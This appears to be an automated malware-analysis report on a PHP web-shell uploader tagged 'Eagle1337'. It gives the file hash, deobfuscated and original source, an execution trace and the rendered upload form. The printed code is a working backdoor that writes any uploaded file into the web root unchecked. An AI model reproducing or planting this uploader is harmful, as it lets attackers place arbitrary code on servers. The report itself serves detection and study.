PHP Malware Analysis

uploader.php

md5: bc9c9099103830d5c3a0f08e603ea652

Deobfuscated PHP code

Eagle1337
<?php 
$f = $_FILES;
if (isset($_POST['upl'])) {
    if (isset($f['file'])) {
        if (move_uploaded_file($f['file']['tmp_name'], $f['file']['name'])) {
            echo "<br>" . $f['file']['name'] . " Uploaded!<br>";
        }
    }
} else {
    ?>
   <form action='' method='POST' enctype='multipart/form-data'>
   <input type='file' name='file'>
   <input type='submit' name='upl' value='upload'>
   </form>
  <?php 
}

Execution traces

data/traces/bc9c9099103830d5c3a0f08e603ea652_trace-1676249328.1733.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:49:14.071130]
1	0	1	0.000167	393528
1	3	0	0.000226	395696	{main}	1		/var/www/html/uploads/uploader.php	0	0
1		A						/var/www/html/uploads/uploader.php	3	$f = []
1	3	1	0.000259	395696
			0.000284	314272
TRACE END   [2023-02-12 22:49:14.071273]


Generated HTML code

<html><head></head><body>Eagle1337
   <form action="" method="POST" enctype="multipart/form-data">
   <input type="file" name="file">
   <input type="submit" name="upl" value="upload">
   </form>
  </body></html>

Original PHP code

Eagle1337
<?php
$f=$_FILES;
if(isset($_POST['upl'])){
	if(isset($f['file'])){
		if(move_uploaded_file($f['file']['tmp_name'],$f['file']['name'])){
			echo "<br>".$f['file']['name']." Uploaded!<br>";
		}
	}
}else{
  ?>
   <form action='' method='POST' enctype='multipart/form-data'>
   <input type='file' name='file'>
   <input type='submit' name='upl' value='upload'>
   </form>
  <?php
}?>